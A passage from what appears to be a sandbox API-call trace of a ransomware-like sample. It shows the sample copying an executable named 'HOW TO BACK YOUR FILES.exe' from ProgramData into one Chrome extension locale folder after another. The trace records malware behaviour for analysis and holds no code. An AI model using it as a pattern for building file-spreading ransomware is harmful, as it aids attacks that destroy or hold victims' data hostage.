halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.829] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.830] GetLastError () returned 0x0 [0104.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.830] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.830] CloseHandle (hObject=0x120) returned 1 [0104.830] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834c4a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d634a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d634a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.830] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.830] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.830] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0104.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0104.831] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.831] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.831] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.832] GetLastError () returned 0x0 [0104.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.832] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.832] CloseHandle (hObject=0x120) returned 1 [0104.832] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834b86f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d680d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d680d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.832] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.832] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0104.832] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0104.832] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.832] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.833] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.833] GetLastError () returned 0x0 [0104.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.833] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.834] CloseHandle (hObject=0x120) returned 1 [0104.834] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834aeab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d680d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d680d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.834] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.834] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.834] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0104.834] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0104.834] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.834] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.835] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.835] GetLastError () returned 0x0 [0104.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.835] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.835] CloseHandle (hObject=0x120) returned 1 [0104.835] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a7580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6a6e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6a6e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.836] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.836] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.836] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0104.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0104.836] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.836] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.837] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.837] GetLastError () returned 0x0 [0104.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.837] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.837] CloseHandle (hObject=0x120) returned 1 [0104.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.837] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a2760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6a6e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6a6e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.837] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.837] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.838] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0104.838] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0104.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.838] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.839] GetLastError () returned 0x0 [0104.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.839] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.839] CloseHandle (hObject=0x120) returned 1 [0104.839] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.839] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83496410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6ccfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6ccfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.839] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.839] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.839] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0104.840] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0104.840] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.840] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.840] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.841] GetLastError () returned 0x0 [0104.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.841] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.841] CloseHandle (hObject=0x120) returned 1 [0104.841] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8348c7d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6ccfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6ccfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.841] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.841] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.841] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0104.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User 